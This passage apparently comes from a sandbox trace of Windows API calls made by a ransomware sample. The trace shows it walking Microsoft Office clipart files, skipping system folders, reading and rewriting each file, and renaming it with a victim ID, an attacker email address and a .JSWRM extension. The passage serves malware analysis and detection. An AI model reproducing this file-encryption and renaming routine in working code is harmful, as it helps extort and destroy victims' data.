hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0081.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.184] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8252) returned 1 [0081.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2030) returned 0x205850 [0081.185] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2030, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.186] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2030, lpOverlapped=0x0) returned 1 [0081.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.187] CloseHandle (hObject=0x314) returned 1 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0081.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0081.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0081.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0081.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.187] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0081.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.188] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1350, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105390.WMF", cAlternateFileName="")) returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2=".") returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="..") returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="...") returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="windows") returned -1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="recovery") returned -1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="perflogs") returned -1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="documents and settings") returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="system volume information") returned -1 [0081.188] lstrcmpiW (lpString1="J0105390.WMF", lpString2="msocache") returned -1 [0081.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105390.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105390.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105390.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105390.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105390.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105390.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0081.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.189] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4944) returned 1 [0081.189] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1350) returned 0x205850 [0081.189] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1350, lpOverlapped=0x0) returned 1 [0081.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.191] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1350, lpOverlapped=0x0) returned 1 [0081.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.191] CloseHandle (hObject=0x314) returned 1 [0081.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0081.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0081.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0081.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.193] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105396.WMF", cAlternateFileName="")) returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2=".") returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="..") returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="...") returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="windows") returned -1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="recovery") returned -1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="perflogs") returned -1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="documents and settings") returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="system volume information") returned -1 [0081.193] lstrcmpiW (lpString1="J0105396.WMF", lpString2="msocache") returned -1 [0081.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105396.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105396.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105396.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105396.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105396.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105396.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.194] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11012) returned 1 [0081.195] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b00) returned 0x24d210 [0081.195] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2b00, lpOverlapped=0x0) returned 1 [0081.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.197] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2b00, lpOverlapped=0x0) returned 1 [0081.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.197] CloseHandle (hObject=0x314) returned 1 [0081.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0081.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0081.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0081.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0081.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0081.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0081.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.202] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105398.WMF", cAlternateFileName="")) returned 1 [0081.202] lstrcmpiW (lpString1="J0105398.WMF", lpString2=".") returned 1 [0081.202] lstrcmpiW (lpString1="J0105398.WMF", lpString2="..") returned 1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="...") returned 1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="windows") returned -1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="recovery") returned -1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="perflogs") returned -1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="documents and settings") returned 1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="system volume information") returned -1 [0081.203] lstrcmpiW (lpString1="J0105398.WMF", lpString2="msocache") returned -1 [0081.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105398.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105398.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105398.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105398.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105398.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105398.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0081.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.203] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3328) returned 1 [0081.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd00) returned 0x23fc98 [0081.204] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd00, lpOverlapped=0x0) returned 1 [0081.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.205] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd00, 